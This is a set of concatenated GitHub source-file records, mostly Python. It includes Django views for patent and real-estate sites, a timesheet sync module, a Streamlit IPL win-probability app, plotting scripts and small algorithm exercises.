patent.keyword\n if keyword:\n # 从1开始否则会推荐自己\n relate_patents = Patent.objects.filter(keyword=keyword)[1:2]\n else:\n relate_patents = []\n return render(request, \"patent-detail.html\", {\n 'current_page': 'patent',\n \"patent\": patent,\n \"relate_patents\": relate_patents,\n \"has_fav_patent\": has_fav_patent,\n })\n\n\nclass AddPatentView(View):\n def post(self, request):\n add_patent_form = AddPatentForm(request.POST)\n if add_patent_form.is_valid():\n patent = add_patent_form.save(commit=False)\n patent.seller = request.user\n patent.save()\n return HttpResponse(\n '{\"status\":\"success\"}',\n content_type='application/json')\n else:\n # 通过json的dumps方法把字典转换为json字符串\n return HttpResponse(\n json.dumps(\n add_patent_form.errors),\n content_type='application/json')\n\n\nclass ModifyView(View):\n def post(self, request):\n patent_id = request.POST.get('patent_id', 0)\n patent = Patent.objects.get(id=int(patent_id))\n modify_patent_form = ModifyPatentForm(request.POST, instance=patent)\n if modify_patent_form.is_valid():\n modify_patent_form.save()\n return HttpResponse(\n '{\"status\":\"success\"}',\n content_type='application/json')\n else:\n # 通过json的dumps方法把字典转换为json字符串\n return HttpResponse(\n json.dumps(\n modify_patent_form.errors),\n content_type='application/json')\n\n def get(self, request, patent_id):\n # 此处的id为表默认为我们添加的值。\n patent = Patent.objects.get(id=int(patent_id))\n return render(request, \"usercenter-publish-modify.html\", {\n \"patent\": patent\n })\n","repo_name":"kingvern/txplatform","sub_path":"apps/patent/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16498927859","text":"'''\nIs Unique: Implement an algorithm to determine if a string has all unique characters. What if you\ncannot use additional data structures?\nHints: #44, #117, #132 \n\n'''\n'''\nPS: Assuming String to be 256 unicoded\n'''\nfrom unicodedata import name\n\n\ndef is_Unique(string):\n \n #edge case\n if (len(string) == 1):\n return True\n \n unique_char = [False] * 256\n\n for char in string:\n if(unique_char[ord(char)] == False):\n unique_char[ord(char)] = True\n else:\n return False\n \n return True\n\nif __name__ == '__main__':\n str1 = input(\"Enter String >> \")\n answer = is_Unique(str1.strip())\n print(answer)","repo_name":"Harshadjoshi01/Cracking_The_Coding_Interview_With_Python","sub_path":"Arrays_And_Strings/Is_Unique.py","file_name":"Is_Unique.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71148527185","text":"import datetime\nfrom functools import partial\n\nimport numpy as np\nimport pandas as pd\n\nfrom middleware.base_table import (\n BaseTable,\n EMPLOYEE_NAME,\n PROJECT_NUMBER,\n SIMPLICATE_ID,\n MONEY,\n HOURS,\n)\nfrom middleware.employee import Employee\nfrom middleware.middleware_utils import singleton, panic\nfrom model.caching import cache\nfrom model.utilities import Period, Day\nfrom sources.simplicate import simplicate, flatten_hours_data, calculate_turnover\n\n\n@singleton\nclass Timesheet(BaseTable):\n def __init__(self):\n super().__init__()\n self.table_name = \"timesheet\"\n self.table_definition = f\"\"\"\n day VARCHAR(10) NOT NULL,\n week INTEGER NOT NULL,\n year INTEGER NOT NULL,\n employee {EMPLOYEE_NAME} NOT NULL,\n\n project_number {PROJECT_NUMBER} NOT NULL,\n\n service_id {SIMPLICATE_ID} NOT NULL,\n revenue_group VARCHAR(40) NOT NULL,\n\n tariff {MONEY} NOT NULL,\n\n type VARCHAR(10) NOT NULL,\n label VARCHAR(100) NOT NULL,\n\n hours {HOURS} NOT NULL,\n turnover {MONEY} NOT NULL,\n corrections {HOURS} NOT NULL,\n corrections_value {MONEY} NOT NULL,\n \n created_at DATETIME NOT NULL,\n \"\"\"\n self.primary_key = \"day, employee, service_id, label\"\n self.index_fields = (\n \"day employee project_number type updated year__week created_at\"\n )\n self.service_dict = (\n None # Hash table of all services. Used to lookup extra service data\n )\n # try:\n # self.db.execute(f\"CREATE INDEX timesheet_year_week ON timesheet (year,week)\")\n # except OperationalError:\n # pass # index already existent\n\n def get_service_dict(self):\n if not self.service_dict:\n sim = simplicate()\n services = sim.service()\n self.service_dict = {s[\"id\"]: s for s in services}\n return self.service_dict\n\n def update(self, day=None, only_this_day=False):\n \"\"\"Updates all timesheet entries starting with day if provided,\n 14 days before the latest entry if day is not provided\n or 1-1-2021 if there was no last entry.\"\"\"\n\n # Find the newest day in database\n if not day:\n newest_result = self.db.first(\"select max(day) as day from timesheet\")[\n \"day\"\n ]\n if newest_result:\n day = Day(newest_result).plus_days(-14)\n else:\n day = Day(2021, 1, 1)\n today = Day()\n while day < today:\n self.db.execute(f'delete from timesheet where day = \"{day}\"')\n data_func = partial(self.get_day_data, day, self.get_service_dict())\n self.insert_dicts(data_func)\n day = day.next()\n if only_this_day:\n break\n self.correct_revenue_groups()\n self.correct_fixed_price()\n\n def correct_revenue_groups(self):\n self.db.execute(\n \"\"\"\n update timesheet set revenue_group=\"Omzet teampropositie\" where project_number in (\"BEN-1\",\"VHC-1\",'EASY-6');\n update timesheet set revenue_group=\"Omzet productpropositie\" \n where revenue_group in (\"Omzet development\",\"Omzet app development\");\n update timesheet set revenue_group=\"Omzet Travelbase\" \n where project_number like \"TRAV-%\" or project_number=\"TOR-3\";\n update timesheet set revenue_group=\"Omzet productpropositie\" where project_number in (\"SLIM-30\",\"THIE-17\",'VERH-1','TER-2');\n update timesheet set revenue_group='Omzet teampropositie' where project_number like \"COL-%\";\n update timesheet set revenue_group=\"\" \n where project_number like \"OBE-%\" or project_number like \"QIKK-%\" or label=\"Internal\";\n update timesheet set revenue_group=\"Omzet productpropositie\" \n where revenue_group=\"\" and project_number not like \"OBE-%\";\n update timesheet set revenue_group=\"Omzet overig\" where project_number like \"CAP-%\";\n update timesheet set revenue_group=\"\" where type in (\"leave\",\"absence\");\n update timesheet set revenue_group='Omzet service' where project_number='MANA-6';\n \"\"\"\n )\n self.db.commit()\n\n def correct_fixed_price(self):\n calculate_hourly_rates_query = \"\"\"\n select s.service_id, \n if(s.status='open', LEAST(price/sum(hours+corrections),100), price/sum(hours+corrections)) as hourly_rate \n from timesheet t\n join service s on s.service_id=t.service_id\n where invoice_method='FixedFee'\n group by s.service_id\n having hourly_rate>0\"\"\"\n for rec in self.db.query(calculate_hourly_rates_query):\n self.db.execute(\n f\"\"\"\n update timesheet \n set tariff={rec['hourly_rate']}, turnover=(hours+corrections) * {rec['hourly_rate']} \n where service_id=\"{rec['service_id']}\" \"\"\"\n )\n self.db.commit()\n\n def get_data(self):\n day = Day(2021, 1, 1)\n today = Day()\n while day < today:\n for data in self.get_day_data(day, self.get_service_dict()):\n yield data\n day = day.next() # Move to the next day before repeating the loop\n\n def get_day_data(self, day: Day, services: dict):\n sim = simplicate()\n\n print(\"retrieving\", day)\n data = sim.hours({\"day\": day})\n if data:\n flat_data = flatten_hours_data(data)\n grouped_data = group_by_daypersonservicelabel(flat_data)\n for te in grouped_data:\n yield complement_timesheet_data(te, services) # %(name)s\n\n @staticmethod\n def where_clause(\n period: Period, only_clients=0, only_billable=0, users=None, hours_type=None\n ):\n query = f'where day>=\"{period.fromday}\"'\n if period.untilday:\n query += f' and day<\"{period.untilday}\"'\n if hours_type:\n query += f' and type=\"{hours_type}\"'\n\n if only_clients:\n query = (\n \" join project on project.project_number=timesheet.project_number \"\n + query\n + ' and organization not in (\"Oberon\", \"Qikker Online B.V.\") '\n )\n if users:\n if isinstance(users, str):\n users = (users,) # make it a tuple\n users_string = '(\"' + '\",\"'.join(users) + '\")'\n query += f\" and employee in {users_string}\"\n else:\n employees = Employee()\n interns = employees.interns()\n query += f\"\"\" and employee not in (\"{'\",\"'.join(interns)}\")\"\"\"\n if only_billable:\n query += \" and tariff > 0\"\n\n return query\n\n def count(self):\n return self.db.execute(\"select count(*) as aantal from timesheet\")[0][\"aantal\"]\n\n def geboekte_uren(\n self, period, users=None, only_clients=0, only_billable=0\n ) -> float:\n\n query = self.where_clause(\n period,\n users=users,\n only_clients=only_clients,\n only_billable=only_billable,\n hours_type=\"normal\",\n )\n if only_billable:\n query = \"select sum(hours+corrections) as result from timesheet \" + query\n else:\n query = \"select sum(hours) as result from timesheet \" + query\n result = float(self.db.first(query)[\"result\"] or 0)\n return result\n\n def geboekte_omzet(\n self, period, users=None, only_clients=0, only_billable=0\n ) -> float:\n query = self.where_clause(\n period,\n users=users,\n only_clients=only_clients,\n only_billable=only_billable,\n hours_type=\"normal\",\n )\n query = \"select sum(turnover) as result from timesheet \" + query\n query_result = self.db.first(query)\n result = float(query_result[\"result\"] or 0)\n return result\n\n def normal_hours(self, period: Period, employees: list = []):\n \"\"\"Number of hours with the type normal in Period. Filtering on employees is optional.\"\"\"\n return self.hours_with_type(period, \"normal\", employees)\n\n def leave_hours(self, period: Period, employees: list = []):\n \"\"\"Number of hours with the type leave in Period. Filtering on employees is optional.\"\"\"\n return self.hours_with_type(period, \"leave\", employees)\n\n def absence_hours(self, period: Period, employees: list = []):\n \"\"\"Number of hours with the type absence in Period. Filtering on employees is optional.\"\"\"\n return self.hours_with_type(period, \"absence\", employees)\n\n def hours_with_type(self, period: Period, hours_type: str, employees: list = []):\n \"\"\"Logged hours with the given type (normal, absence, leave) in Period. Filtering on employees is optional.\"\"\"\n query = \"select sum(hours) as result from timesheet \" + self.where_clause(\n period, users=employees, hours_type=hours_type\n )\n query_result = self.db.first(query)\n result = float(query_result[\"result\"] or 0)\n return result\n\n def parameterized_query(\n self, period: Period, where: str = \"\", sort=None, with_project_data=False\n ):\n if with_project_data:\n query_string = f\"\"\"SELECT t.*, p.organization, p.project_name, p.pm, p.status as project_status \n FROM timesheet t JOIN project p ON p.project_number=t.project_number\"\"\"\n else:\n query_string = \"SELECT * from timesheet\"\n query_string += f' WHERE day>=\"{period.fromday}\"'\n if period.untilday:\n query_string += f' AND day<\"{period.untilday}\"'\n if where:\n query_string += \" AND \" + where\n if sort:\n if not isinstance(sort, list):\n sort = [sort]\n query_string += \" ORDER BY \" + \",\".join(sort)\n yield from self.db.query(query_string)\n\n def full_query(self, query_string):\n yield from self.db.query(query_string)\n\n # def services_with_their_hours_and_turnover(\n # self,\n # service_ids: list,\n # day: Day,\n # ) -> dict[str, tuple[float, int]]:\n # \"\"\"Dict with the given service_ids as keys and their turnovers up to the given day as values\"\"\"\n # services_string = '(\"' + '\",\"'.join(service_ids) + '\")'\n # query = f\"\"\"select service_id, sum(hours) as hours, sum(turnover) as turnover from timesheet\n # where service_id in {services_string} and day<=\"{day}\"\n # group by service_id\"\"\"\n # result = {\n # r[\"service_id\"]: (float(r[\"hours\"]), int(r[\"turnover\"]))\n # for r in self.full_query(query)\n # }\n # return result\n\n def netwerk_uren(self, period: Period):\n query = f\"\"\"select sum(hours) as hours from timesheet \n where label='Netwerken' and day>='{period.fromday}' \"\"\"\n if period.untilday:\n query += f\"\"\" and day<='{period.untilday}' \"\"\"\n return self.db.first(query)[\"hours\"]\n\n\ndef group_by_daypersonservicelabel(list_of_dicts):\n df = pd.DataFrame(list_of_dicts)\n\n def first(x):\n return x.values[0]\n\n key = [\"day\", \"employee\", \"service_id\", \"label\"]\n agg = {colname: first for colname in df.columns if colname not in key}\n agg[\"hours\"] = np.sum\n agg[\"corrections\"] = np.sum\n df2 = df.groupby(key).agg(agg).reset_index()\n return df2.to_dict(\"records\")\n\n\ndef complement_timesheet_data(timesheet_entry, services_dict):\n def week_and_year(day_str):\n week = datetime.datetime.strptime(day_str, \"%Y-%m-%d\").isocalendar()[1]\n year = int(day_str[:4])\n if day_str[5] < \"1\" and week > 50:\n year -= 1\n return week, year\n\n del timesheet_entry[\"project_id\"]\n del timesheet_entry[\"hours_id\"]\n del timesheet_entry[\"billable\"]\n del timesheet_entry[\"status\"]\n if not timesheet_entry[\"tariff\"] and (\n timesheet_entry[\"employee\"] not in Employee().interns()\n ):\n timesheet_entry[\"tariff\"] = timesheet_entry[\"service_tariff\"]\n del timesheet_entry[\"service_tariff\"]\n timesheet_entry[\"turnover\"] = calculate_turnover(timesheet_entry)\n del timesheet_entry[\n \"service\"\n ] # Wordt nog gebruikt in calculate_turnover maar mag nu weg\n timesheet_entry[\"week\"], timesheet_entry[\"year\"] = week_and_year(\n timesheet_entry[\"day\"]\n )\n timesheet_entry[\"corrections_value\"] = (\n timesheet_entry[\"corrections\"] * timesheet_entry[\"tariff\"]\n )\n\n # Find the revenue group\n timesheet_entry[\"revenue_group\"] = \"\"\n service = services_dict.get(timesheet_entry[\"service_id\"])\n if service:\n revenue_group = service.get(\"revenue_group\")\n if revenue_group:\n timesheet_entry[\"revenue_group\"] = revenue_group[\"label\"]\n\n # De volgende is omdat in 2021 de indeling nog niet goed was\n if (\n timesheet_entry[\"type\"] == \"absence\"\n and timesheet_entry[\"label\"] == \"Feestdagenverlof / National holidays leave\"\n ):\n timesheet_entry[\"type\"] = \"leave\"\n return timesheet_entry\n\n\n@cache(hours=4)\ndef hours_dataframe(period: Period):\n timesheet = Timesheet()\n list_of_dicts = timesheet.parameterized_query(period, with_project_data=True)\n if not list_of_dicts:\n panic(\"hours_dataframe is empty for period\", period)\n df = pd.DataFrame(list_of_dicts)\n df.tariff = df.tariff.astype(float)\n df.hours = df.hours.astype(float)\n df.turnover = df.turnover.astype(float)\n df.corrections = df.corrections.astype(float)\n df.corrections_value = df.corrections_value.astype(float)\n return df\n\n\nif __name__ == \"__main__\":\n timesheet_table = Timesheet()\n timesheet_table.update(Day(\"2021-01-01\"), only_this_day=False)\n # timesheet_table.hours_with_type(\n # Period(\"2022-04-26\", \"2022-04-28\"), hours_type=\"leave\"\n # )\n # pass\n # timesheet_table.repopulate()\n #\n # timesheet_table.correct_revenue_groups()\n # timesheet_table.correct_fixed_price()\n","repo_name":"hpharmsen/dashboard-static","sub_path":"middleware/timesheet.py","file_name":"timesheet.py","file_ext":"py","file_size_in_byte":14187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23389190699","text":"import streamlit as st\nimport pandas as pd\nimport pickle\nteams = ['Royal Challengers Bangalore',\n 'Kings XI Punjab',\n 'Mumbai Indians',\n 'Kolkata Knight Riders',\n 'Rajasthan Royals',\n 'Chennai Super Kings',\n 'Sunrisers Hyderabad',\n 'Delhi Capitals']\n\ncity_names = ['Bangalore', 'Mumbai', 'Delhi', 'Indore', 'Nagpur', 'Ahmedabad',\n 'Chandigarh', 'Hyderabad', 'Cuttack', 'Jaipur', 'Sharjah',\n 'Kolkata', 'Pune', 'Chennai', 'Abu Dhabi', 'Dubai',\n 'Visakhapatnam', 'Raipur', 'Bengaluru', 'Dharamsala', 'Ranchi']\n\npipe = pickle.load(open('pipe.pkl','rb'))\nst.markdown(\"

IPL Win Probability

\", unsafe_allow_html=True)\n\ncol1,col2 = st.columns(2)\nwith col1:\n batting_team = st.selectbox('Select Batting Team',sorted(teams))\nwith col2:\n bowling_team = st.selectbox('Select Bowling Team',sorted(teams))\n\nif batting_team == bowling_team :\n st.error('Choose diffrent teams')\n\ncity = st.selectbox('Select city',sorted(city_names))\ntarget = st.number_input('Target')\n\ncol1,col2,col3 = st.columns(3)\nwith col1 :\n score = st.number_input('Score')\nwith col2 :\n wickets = st.number_input('Wickets')\nwith col3 :\n overs = st.number_input('Overs completed ')\n\nif st.button('Predict Probability'):\n runs_left = target - score\n wickets = 10 - wickets\n balls_left = 120 -(overs*6)\n current_run_rate = score/overs\n req_run_rate = (runs_left*6)/balls_left\n\n df = pd.DataFrame({'batting_team':[batting_team],'bowling_team':[bowling_team],'city':[city],'runs_left':[runs_left],'balls_left':[balls_left],'wickets':[wickets],\n 'current_run_rate':[current_run_rate],'req_run_rate':[req_run_rate],'total_runs_x':[target]})\n\n result = pipe.predict_proba(df)\n loss = result[0][0]\n win = result[0][1]\n st.header(batting_team + ' ' + str(round(win*100))+'%')\n st.header(bowling_team + ' '+ str(round(loss*100))+'%')\n\n\n","repo_name":"devrahul9119/Ipl-match-winning-probability","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24144698720","text":"import sys\nimport socket\ncom = socket.gethostname()\nif com in ('piai-Precision-7920-Tower', 'Normalistui-MacBookPro.local'):\n this_file_name = sys._getframe().f_code.co_filename\n sys.stdin = open(f\"{this_file_name[:-3]}.txt\", \"r\")\n\nT = int(input())\n# 여러개의 테스트 케이스가 주어지므로, 각각을 처리합니다.\nfor test_case in range(1, T + 1):\n\n print(f\"#{test_case}\")\n","repo_name":"Normalist-K/algorithm","sub_path":"study/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31577050302","text":"from django.http import HttpResponse\nfrom django.conf import settings\nfrom django.views.decorators.http import require_POST\n\nfrom app.models import Athlete\nfrom .utils.getPolyline import getStreamsFromPolyline\nfrom .utils.getLaps import getDeviceLaps, getAutoLaps, getSkiRuns\nfrom .graphs.paceElevGraph import paceElevGraph\nfrom .graphs.model3DGraph import model3DGraph\nfrom .graphs.mapThumbnailGraph import mapThumbnail\nfrom .graphs.annotatedMap import annotatedMap\nfrom .graphs.paceZonesGraph import paceZonesGraph\nfrom .graphs.skiSpeedZonesGraph import skiSpeedZonesGraph\nfrom .graphs.gradeZonesGraph import gradeZonesGraph\nfrom .graphs.lapsBarChart import lapsBarChart\nfrom .graphs.dashboardTable import dashboardTable\nfrom .graphs.dashboardBarChart import dashboardBarChart\nfrom .graphs.dashboardScheduleChart import dashboardScheduleChart\nfrom .graphs.trendsBarChart import trendsBarChart\n\nimport json\nimport datetime\nimport boto3\n\n@require_POST\ndef getPaceElevGraph(request):\n activity = json.loads(request.body)\n athlete = Athlete.objects.get(pk=activity['fields']['athlete'])\n graph = paceElevGraph(activity, athlete)\n return HttpResponse(graph)\n\n@require_POST\ndef get3DModelGraph(request):\n activity = json.loads(request.body)\n athlete = Athlete.objects.get(pk=activity['fields']['athlete'])\n graph = model3DGraph(activity, athlete)\n return HttpResponse(graph)\n\n@require_POST\ndef getMapThumbnail(request):\n activity = json.loads(request.body)\n graph = mapThumbnail(\n activity['streams']['latStream'],\n activity['streams']['lngStream']\n )\n return HttpResponse(graph)\n\n@require_POST\ndef getAnnotatedMap(request):\n activity = json.loads(request.body)\n athlete = Athlete.objects.get(pk=activity['fields']['athlete'])\n graph = annotatedMap(athlete, activity)\n return HttpResponse(graph)\n\n@require_POST\ndef getPaceZonesGraph(request):\n activity = json.loads(request.body)\n athlete = Athlete.objects.get(pk=activity['fields']['athlete'])\n if activity['isAmbulatory']:\n graph = paceZonesGraph(activity, athlete)\n else:\n graph = skiSpeedZonesGraph(activity, athlete)\n return HttpResponse(graph)\n\n@require_POST\ndef getGradeZonesGraph(request):\n activity = json.loads(request.body)\n athlete = Athlete.objects.get(pk=activity['fields']['athlete'])\n graph = gradeZonesGraph(activity, athlete)\n return HttpResponse(graph)\n\n@require_POST\ndef getHeatmap(request):\n athleteId = json.loads(request.body)['athlete']\n athlete = Athlete.objects.get(pk=athleteId)\n client = boto3.client(\n 's3',\n region_name=settings.AWS_REGION_NAME,\n aws_access_key_id=settings.AWS_ACCESS_KEY_ID,\n aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY\n )\n obj = client.get_object(\n Bucket=settings.AWS_HEATMAP_BUCKET_NAME,\n Key=f'heatmap-graph-html-{athlete.id}.html'\n )\n graph = obj['Body'].read().decode('utf-8')\n return HttpResponse(graph)\n\n@require_POST\ndef getlapsBarChartDevice(request):\n activity = json.loads(request.body)\n athlete = Athlete.objects.get(pk=activity['fields']['athlete'])\n laps = getDeviceLaps(activity, athlete)\n graph = lapsBarChart(activity, laps, athlete)\n return HttpResponse(graph)\n\n@require_POST\ndef getlapsBarChartAuto(request):\n activity = json.loads(request.body)\n athlete = Athlete.objects.get(pk=activity['fields']['athlete'])\n if activity['isAmbulatory']:\n laps = getAutoLaps(activity, athlete)\n else:\n laps = getSkiRuns(activity, athlete)\n graph = lapsBarChart(activity, laps, athlete)\n return HttpResponse(graph)\n\n@require_POST\ndef getDashboardTable(request):\n data = json.loads(request.body)\n athlete = Athlete.objects.get(pk=data['athlete'])\n fromDate = datetime.datetime.strptime(data['fromDate'], '%Y-%m-%d')\n toDate = datetime.datetime.strptime(data['toDate'], '%Y-%m-%d')\n table = dashboardTable(fromDate, toDate, athlete)\n return HttpResponse(table)\n\n@require_POST\ndef getDashboardBarChart(request):\n data = json.loads(request.body)\n athlete = Athlete.objects.get(pk=data['athlete'])\n fromDate = datetime.datetime.strptime(data['fromDate'], '%Y-%m-%d')\n toDate = datetime.datetime.strptime(data['toDate'], '%Y-%m-%d')\n metric = data['metric']\n graph = dashboardBarChart(athlete, metric, fromDate, toDate)\n return HttpResponse(graph)\n\n@require_POST\ndef getDashboardScheduleChart(request):\n data = json.loads(request.body)\n athlete = Athlete.objects.get(pk=data['athlete'])\n fromDate = datetime.datetime.strptime(data['fromDate'], '%Y-%m-%d')\n toDate = datetime.datetime.strptime(data['toDate'], '%Y-%m-%d')\n graph = dashboardScheduleChart(athlete, fromDate, toDate)\n return HttpResponse(graph)\n\n@require_POST\ndef getTrendsBarChart(request):\n data = json.loads(request.body)\n athlete = Athlete.objects.get(pk=data['athlete'])\n period = data['period']\n metric = data['metric']\n graph = trendsBarChart(athlete, metric, period)\n return HttpResponse(graph)\n","repo_name":"sfergusond/runcrunch","sub_path":"graph/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"29771186193","text":"from django.http.response import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import redirect, render\nfrom .models import Inquiry, Listing, Realtor\nfrom .filters import ListingFilter\nfrom django.urls import reverse\nfrom .forms import InquiryForm\nfrom django.contrib.auth.decorators import login_required\n\ndef HomeView(request):\n\ttemplate = \"home.html\"\n\tlistings = Listing.objects.filter(is_published=True)\n\tmyfilter = ListingFilter(request.GET, queryset=listings)\n\tlistings = myfilter.qs\n\tcontext = {\n\t\t'results' : listings,\n\t\t'filter' : myfilter,\n\t}\n\n\treturn render(request, template, context)\n\ndef PropertyDetailView(request, pk):\n\ttemplate = \"property_details.html\"\n\ttry:\n\t\tproperty = Listing.objects.get(id=pk)\n\texcept:\n\t\treturn HttpResponse(\"Property does not exist\")\n\tcontext = {\n 'property' : property,\n\t}\n\n\treturn render(request, template, context)\n\n@login_required\ndef InquiryCreateView(request, pk):\n\ttemplate = \"inquirycreate.html\"\n\tproperty = Listing.objects.get(id=pk)\n\tcontacts = Inquiry.objects.filter(listing=property)\n\tinquiries = contacts.filter(user=request.user)\n\tif not inquiries:\n\t\tform = InquiryForm()\n\t\tif request.method == \"POST\":\n\t\t\tphone = request.POST.get(\"phone\")\n\t\t\tmessage = request.POST.get(\"message\")\n\t\t\tinquiry = Inquiry.objects.create(\n\t\t\t\tlisting=property,\n\t\t\t\tuser=request.user,\n\t\t\t\tphone=phone,\n\t\t\t\tmessage=message\n\t\t\t)\n\t\t\tinquiry.save()\n\t\t\treturn HttpResponseRedirect(reverse('details', args=[str(property.id)]))\n\t\tcontext = {\n\t\t\t'form' : form,\n\t\t\t'property' : property,\n\t\t}\n\n\t\treturn render(request, template, context)\n\telse:\n\t\treturn redirect('dashboard')\n\n@login_required\ndef DashboardView(request):\n\ttemplate = \"dashboard.html\"\n\tcontacts = Inquiry.objects.filter(user=request.user)\n\tcontext = {\n 'contacts' : contacts,\n\t}\n\t\n\treturn render(request, template, context)\n@login_required\ndef DeleteInquiryView(request, id):\n\tif request.method == \"POST\":\n\t\tinquiry = Inquiry.objects.filter(id=id)\n\t\tif inquiry.first().user == request.user:\n\t\t\tinquiry.delete()\n\t\t\treturn redirect('dashboard')\n\t\telse:\n\t\t\treturn redirect('dashboard')\n\telse:\n\t\treturn redirect('dashboard')\n\ndef AboutView(request):\n\ttemplate = \"about.html\"\n\trealtors = Realtor.objects.all()\n\tbest = realtors.filter(is_mvp=True).first()\n\tif best:\n\t\tcontext = {\n\t\t\t'realtors' : realtors,\n\t\t\t'best' : best,\n\n\t\t}\n\telse:\n\t\tcontext = {\n\t\t\t'realtors' : realtors,\n\n\t\t}\n\t\t\n\n\treturn render(request, template, context)","repo_name":"Nepul321/Real-estate-Django","sub_path":"base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23633278551","text":"import argparse\nimport numpy as np\nimport h5py\nimport json\nimport string\nimport matplotlib as mpl\nfrom matplotlib import pyplot as plt\nfrom matplotlib import gridspec\nfrom mpl_toolkits.basemap import Basemap\nimport colormaps\n\n\n\ndef plot_panel(\n filename,\n show_colorbar=True,\n xaxis='bottom',\n norm=None,\n cmap=None,\n annotation=None\n):\n with h5py.File(filename) as f:\n correction_factor = 1.0*f['cloud_incidence_2'][::]/f['cloud_incidence_1'][::]\n\n m = Basemap(\n llcrnrlon=-180,\n llcrnrlat=-90,\n urcrnrlon=180,\n urcrnrlat=90\n )\n im = m.imshow(correction_factor.T,\n # im = m.imshow((f['cloud_incidence_1'][::]/f['cloud_incidence_1_total'][::]).T,\n interpolation='nearest',\n norm=norm,\n cmap=cmap\n )\n # if show_colorbar:\n # m.colorbar(im, 'right', size='3%', pad='3%')\n m.drawcoastlines(linewidth=0.1)\n m.drawcountries(linewidth=0.1)\n m.drawparallels(np.arange(-90.,91.,20.), labels=[1,0,0,1], linewidth=0.1, color='#333333', fontsize=10)\n\n if xaxis == 'bottom':\n labels = [0, 0, 0, 1]\n elif xaxis == 'top':\n labels = [0, 0, 1, 0]\n else:\n labels = [0, 0, 0, 0]\n m.drawmeridians(np.arange(-180.,180.,30.), labels=labels, linewidth=0.1, color='#333333', fontsize=10)\n\n if annotation is not None:\n plt.annotate(\n annotation,\n xy=(0, 1),\n xytext=(5, -5),\n ha='left',\n va='top',\n xycoords='axes fraction',\n textcoords='offset points',\n weight='bold'\n )\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Plot correction factor (multi)')\n parser.add_argument('-c', dest='config', help='config file')\n parser.add_argument('-o', dest='outfile', type=str, help='output plot')\n args = parser.parse_args()\n config = json.load(open(args.config))\n\n plt.figure(figsize=(8,12))\n plt.viridis()\n plt.rcParams['font.family'] = 'Open Sans'\n\n nrows = len(config['files'])\n\n gs = gridspec.GridSpec(\n nrows + 1,\n 1,\n wspace=0,\n hspace=0.15,\n height_ratios=(0.3, 0.3, 0.3, 0.015)\n )\n\n norm = mpl.colors.Normalize(0.2, 2)\n cmap = colormaps.parula\n\n for i, filename in enumerate(config['files']):\n plt.subplot(gs[i])\n\n if i == 0:\n xaxis = 'top'\n elif i == nrows - 1:\n xaxis = 'bottom'\n else:\n xaxis = None\n\n plot_panel(\n filename,\n xaxis=xaxis,\n show_colorbar=(i == 0),\n norm=norm,\n cmap=cmap,\n annotation=string.lowercase[i]\n )\n\n plt.annotate(\n config['labels'][i],\n xy=(-0.15, 0.5), xytext=(0, 0),\n xycoords=('axes fraction', 'axes fraction'),\n textcoords='offset points',\n size=14,\n ha='left',\n va='center',\n weight='bold'\n )\n\n cax = plt.subplot(gs[nrows])\n cb = mpl.colorbar.ColorbarBase(\n cax,\n orientation='horizontal',\n extend='both',\n cmap=cmap,\n norm=norm\n )\n cb.set_label('8.3 to 8 km cloud occurrence ratio (1)')\n\n if args.outfile:\n plt.savefig(args.outfile, bbox_inches='tight', pad_inches=0.5)\n else:\n plt.show()\n","repo_name":"peterkuma/clouds-ross-sea-2018","sub_path":"scripts/plot_correction_factor_multi.py","file_name":"plot_correction_factor_multi.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"19351697075","text":"def moveNameInDB(key, dbCursor):\n dbCursor.execute(\"select movename from moves where movename=? collate nocase\", (key,))\n moves = dbCursor.fetchall()\n\n if not moves:\n return False\n return True\n\n\nasync def getCharMoves(char, dbCursor):\n dbCursor.execute(\"select movename from moves where charname=? collate nocase\", (char,))\n moves = dbCursor.fetchall()\n\n if not moves:\n return None\n\n moveString = \"```\"\n for move in moves:\n moveString = moveString + (move[0]) + \"\\n\"\n moveString = moveString + \"```\"\n\n return moveString\n\n\ndef getFrameData(char, move, dbCursor):\n \"\"\"Function returning a list of strings containing framedata\n for each move found in the database. If a precise result is found,\n return that one. If not, return a relaxed result where only similar\n moves are being found.\"\"\"\n\n dbCursor.execute(\"select * from moves where charname=? collate nocase and\\\n movename =? collate nocase\", (char, move))\n\n retVal = dbCursor.fetchall()\n\n if not retVal:\n #Nothing found with precise search, relax the movename reqs\n dbCursor.execute(\"select * from moves where charname=? collate nocase and\\\n movename like ? collate nocase\", (char, '%' + move + '%'))\n retVal = dbCursor.fetchall()\n\n return retVal\n","repo_name":"prki/eddiebot","sub_path":"DbReader.py","file_name":"DbReader.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2647991512","text":"import os\nimport logging\n\nimport numpy as np\n\nfrom alias.io.numpy_io import load_npy\nfrom alias.io.checkfile_io import (\n save_checkfile\n)\nfrom alias.src.positions import batch_coordinate_loader\nfrom alias.src.surface_parameters import SurfaceParameters\nfrom alias.src.intrinsic_sampling_method import (\n create_intrinsic_surfaces\n)\nfrom alias.src.intrinsic_analysis import (\n create_intrinsic_positions_dxdyz,\n create_intrinsic_den_curve_hist,\n av_intrinsic_distributions\n)\nfrom 